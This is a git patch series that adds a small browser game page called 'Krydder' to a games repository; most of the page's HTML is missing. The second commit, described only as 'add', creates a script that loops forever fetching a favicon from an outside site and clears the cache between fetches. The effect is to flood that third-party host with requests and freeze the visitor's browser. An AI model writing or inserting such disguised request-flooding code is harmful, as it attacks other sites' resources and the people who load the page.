From 4dcb16985c34b7be0a8491b4a8e3a26b291bd51d Mon Sep 17 00:00:00 2001 From: hexahigh <97455552+hexahigh@users.noreply.github.com> Date: Thu, 15 Dec 2022 16:40:58 +0100 Subject: [PATCH 1/2] added Krydder or something --- Games/Krydder/index.html | 45 ++++++++++++++++++++++++++++++++++++++++ 1 file changed, 45 insertions(+) create mode 100644 Games/Krydder/index.html diff --git a/Games/Krydder/index.html b/Games/Krydder/index.html new file mode 100644 index 0000000..b27540a --- /dev/null +++ b/Games/Krydder/index.html @@ -0,0 +1,45 @@ + + + + + + +
+ + From ac419c184faea47d2989d6a66aebccca80292400 Mon Sep 17 00:00:00 2001 From: Boof <97455552+hexahigh@users.noreply.github.com> Date: Fri, 16 Dec 2022 10:52:11 +0100 Subject: [PATCH 2/2] add --- Games/Krydder/dlhermann.js | 11 +++++++++++ Games/Krydder/index.html | 1 + 2 files changed, 12 insertions(+) create mode 100644 Games/Krydder/dlhermann.js diff --git a/Games/Krydder/dlhermann.js b/Games/Krydder/dlhermann.js new file mode 100644 index 0000000..a8ac4d9 --- /dev/null +++ b/Games/Krydder/dlhermann.js @@ -0,0 +1,11 @@ +while (true) { + fetch('https://t0m0t0w.github.io/favicon.png') + .then(response => response.text()) + .then(data => { + // Do something with the data + console.log(data); + + // Delete the file from the cache + caches.delete('https://t0m0t0w.github.io/favicon.png'); + }); + } \ No newline at end of file diff --git a/Games/Krydder/index.html b/Games/Krydder/index.html index b27540a..e9d0172 100644 --- a/Games/Krydder/index.html +++ b/Games/Krydder/index.html @@ -38,6 +38,7 @@ setInterval(addKrydder, 1000); +